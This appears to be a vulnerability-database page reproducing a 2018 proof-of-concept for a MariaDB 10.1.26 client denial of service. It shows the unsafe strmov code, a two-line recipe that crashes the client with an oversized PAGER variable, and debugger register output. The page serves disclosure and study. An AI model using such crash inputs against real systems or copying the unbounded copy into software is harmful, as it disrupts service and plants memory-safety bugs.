Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MariaDB Client 10.1.26 Denial Of Service

🗓️ 26 Nov 2018 00:00:00Reported by striderType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 93 Views

MariaDB Client 10.1.26 Denial Of Service vulnerability due to environment variable buffer overflo

Code
`# Exploit Title: MariaDB Client 10.1.26 - Denial of Service (PoC)  
# Google Dork: None  
# Date: 2018-11-16  
# Exploit Author: strider  
# Software Link: https://github.com/MariaDB/server  
# Version: mysql Ver 15.1 Distrib 10.1.26-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2  
# Tested on: Debian 9 Stretch x64 / Ubuntu 18.04 x86_64  
# CVE : None  
  
# Description:  
# MariaDB uses environment variables. The PAGER variable is vulnerable to a bufferoverflow.  
# If the environment variable PAGER is greater or equals 512 characters it will crash and make client unusable.  
  
# This is caused by a the function strmov which takes all from source and copy that   
# into destination which have a fixed size.  
  
Codepart:  
static char default_pager[FN_REFLEN];  
  
char *tmp=getenv("PAGER");  
if (tmp && strlen(tmp))  
{  
default_pager_set= 1;  
strmov(default_pager, tmp);  
}  
  
  
Proof of Concept:  
  
Step 1:  
  
export PAGER=$(python -c "print '\x41' * 512")  
  
Step 2:  
  
mariadb -u user -p  
  
Crash  
  
---------------------------------------------------------------------  
peda output:  
  
Program received signal SIGSEGV, Segmentation fault.  
  
[----------------------------------registers-----------------------------------]  
RAX: 0x555555b73600 ('A' <repeats 200 times>...)  
RBX: 0x555555b7cbc8 ('A' <repeats 200 times>...)  
RCX: 0x70 ('p')  
RDX: 0x0   
RSI: 0x555555bafe40 ('A' <repeats 200 times>...)  
RDI: 0x555555bb0040   
RBP: 0x7fffffffdfa0 --> 0x555555639a80 (<__libc_csu_init>: push r15)  
RSP: 0x7fffffffdd48 --> 0x55555558e5bc (<main+620>: mov rax,QWORD PTR [r12])  
RIP: 0x7ffff677e2e6 (<__strcpy_sse2_unaligned+374>: movdqu XMMWORD PTR [rdi-0x40],xmm4)  
R8 : 0x555555b92580 ('A' <repeats 200 times>...)  
R9 : 0x20 (' ')  
R10: 0x7fffffffa5a0 --> 0x7fffffffa5d0 --> 0x7fffffffdb80 --> 0x7fffffffdc10 --> 0x0   
R11: 0x7ffff6846d68 --> 0xfff37778fff37768   
R12: 0x555555b00bc0 --> 0x555555b00b80 --> 0x40000000 ('')  
R13: 0x7ffff6a846e8 --> 0x7ffff6a84600 --> 0xfbad2084   
R14: 0x0   
R15: 0x0  
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Nov 2018 00:00Current
0.1Low risk
Vulners AI Score0.1
mariadbdenial of serviceenvironment variablebuffer overflowpagervulnerableexploitdebianubuntusegmentation fault
93